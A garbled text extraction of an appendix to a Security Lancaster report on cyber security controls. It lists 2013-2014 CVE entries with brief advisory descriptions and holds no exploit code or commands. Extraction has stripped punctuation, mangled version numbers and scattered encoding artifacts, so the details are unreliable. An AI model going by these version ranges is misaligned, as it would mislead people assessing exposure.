CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055
CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676
CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389
CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo
CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386
CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors
CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd
CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU
CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect
confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity
CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169
CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function
CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document
CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors
CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors
CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location
CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action
CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject
CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate
CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors
CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897
CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation
CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671
CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341
CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)
CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack
CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28
Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet
CVE-2013-2826WellinTech KingSCADA before312 KingAlarmampEvent before 31and x000D KingGraphic before 312perform authentication on the x000DKAEClientManager console rather than onthe server which allows x000D remoteattackers to bypass intended accessrestrictions and discover x000D credentialsvia a crafted packet to TCP port 8130
CVE-2013-2920The DoResolveRelativeHost functionin urlurl canon relativecc in x000DGoogle Chrome before 300159966 allowsremote attackers to cause a x000Ddenial of service (out-of-bounds read)via a relative URL containing a x000Dhostname as demonstrated by a protocol-relative URL beginning with a x000Dwwwgooglecom substring
CVE-2013-3064Open redirect vulnerability inuidynamicunsecuredhtml inLinksys x000D EA6500 with firmware1128147876 allows remote attackers toredirect x000D users to arbitrary web sitesand conduct phishing attacks via a URLin x000D the target parameter
CVE-2013-3116rdquoMicrosoft Internet Explorer 7 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2013-3137rdquoMicrosoft FrontPage 2003 SP3 does notproperly parse DTDs which allows remoteattackers to obtain sensitive information viacrafted XML data in a FrontPage documentaka rdquordquoXML Disclosure Vulnerabilityrdquordquordquo
CVE-2013-3194rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute x000D arbitrary codeor cause a denial of service (memorycorruption) via a x000D crafted website aka rdquordquoInternet Explorer MemoryCorruption x000D Vulnerabilityrdquordquordquo
CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo
CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3206
rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash
CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724
CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262
CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter
CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL
CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo
CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo
CVE-2013-3893Use-after-free vulnerability in theSetMouseCapture implementationin x000D mshtmldll in MicrosoftInternet Explorer 6 through 11 allowsremote x000D attackers to executearbitrary code via crafted JavaScript stringsas x000D demonstrated by use of an ms-help URL that triggers loading of x000Dhxdsdll
CVE-2013-3897rdquoUse-after-free vulnerability in theCDisplayPointer class in mshtmldll in
Microsoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via crafted JavaScript code thatuses the onpropertychange event handleras exploited in the wild in September andOctober 2013 aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2013-3900rdquoThe WinVerifyTrust function in MicrosoftWindows XP SP2 and SP3 Windows Server2003 SP2 Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and Windows RTGold and 81 does not properly validate PEfile digests during Authenticode signatureverification which allows remote attackersto execute arbitrary code via a craftedPE file aka rdquordquoWinVerifyTrust SignatureValidation Vulnerabilityrdquordquordquo
CVE-2013-3905rdquoMicrosoft Outlook 2007 SP3 2010 SP1and SP2 2013 and 2013 RT does x000Dnot properly expand metadata containedin SMIME certificates which x000Dallows remote attackers to obtain sensitivenetwork configuration and x000D stateinformation via a crafted certificate in an e-mail message aka x000D rdquordquoSMIME AIAVulnerabilityrdquordquordquo
CVE-2013-4223The Gentoo Nullmailer package before 111-r2 uses world-readable x000D permissionsfor etcnullmailerremotes which allowslocal users to x000D obtain SMTPauthentication credentials by reading thefile
CVE-2013-4436The default configuration for salt-ssh inSalt (aka SaltStack) 0170 x000D doesnot validate the SSH host key of requestswhich allows remote x000D attackers tohave unspecified impact via a man-in-the-middle (MITM) x000D attack
CVE-2013-4478Sup before 01321 and 014x before01411 allows remote attackers x000Dto execute arbitrary commands via shellmetacharacters in the filename x000D ofan email attachment
CVE-2013-4529Buffer overflow in hwpcipcie aerc inQEMU before 172 allows x000D remoteattackers to cause a denial of service andpossibly execute x000D arbitrary code viaa large log num value in a savevm image
CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors
CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem
CVE-2013-4782
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 21 of 28
The Supermicro BMC implementationallows remote attackers to bypass x000Dauthentication and execute arbitrary IPMIcommands by using cipher x000D suite 0(aka cipher zero) and an arbitrary password
CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo
CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service
CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors
CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors
CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674
CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975
CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521
CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139
CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622
CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors
CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx
CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement
CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse
CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors
CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo
CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate
CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow
CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site
CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880
CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902
CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227
CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network
CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network
CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug
CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file
CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo
CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo
